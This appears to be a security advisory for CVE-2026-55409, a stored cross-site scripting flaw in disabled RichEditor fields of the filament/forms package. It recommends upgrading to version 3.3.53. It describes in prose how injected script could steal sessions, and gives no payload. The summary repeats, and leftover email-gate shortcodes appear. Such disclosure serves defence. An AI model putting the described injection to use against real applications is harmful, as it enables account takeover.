EXECUTIVE SUMMARY:
CVE-2026-55409 with a CVSS score of 7.6 is a high-severity vulnerability in the filament /forms package, specifically affecting versions 3.0.0 through 3.3.52, where a disabled RichEditor field can be exploited for cross-site scripting (XSS) attacks due to the lack of HTML sanitization when rendering the field's raw state. An attacker can exploit this vulnerability by injecting malicious HTML or JavaScript code into the field's state, which would then be executed when a user views the form, requiring access to the form's data storage or submission process, potentially through a web application's user input interface. If successfully exploited, the attacker gains the ability to execute arbitrary JavaScript code in the context of the vulnerable web application, allowing for various malicious activities such as stealing user sessions, modifying data, or taking control of user accounts. The business impact and consequences of this vulnerability can be significant, including compromised user data, system integrity, and potential financial losses, and prerequisites for exploitation include the ability to inject or store malicious code in the RichEditor field's state, which can be achieved if the data stored in this field is not properly sanitized when the form state is filled.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
CVE-2026-55409 with a CVSS score of 7.6 is a high-severity vulnerability in the filament /forms package, specifically affecting versions 3.0.0 through 3.3.52, where a disabled RichEditor field can be exploited for cross-site scripting (XSS) attacks due to the lack of HTML sanitization when rendering the field's raw state. An attacker can exploit this vulnerability by injecting malicious HTML or JavaScript code into the field's state, which would then be executed when a user views the form, requiring access to the form's data storage or submission process, potentially through a web application's user input interface. If successfully exploited, the attacker gains the ability to execute arbitrary JavaScript code in the context of the vulnerable web application, allowing for various malicious activities such as stealing user sessions, modifying data, or taking control of user accounts. The business impact and consequences of this vulnerability can be significant, including compromised user data, system integrity, and potential financial losses, and prerequisites for exploitation include the ability to inject or store malicious code in the RichEditor field's state, which can be achieved if the data stored in this field is not properly sanitized when the form state is filled.[emaillocker id="1283"]
RECOMMENDATION:
We recommend you to update filament /forms to version 3.3.53.
REFERENCES:
The following reports contain further technical details:
https://github.com/advisories/GHSA-m9cv-24rx-8mv7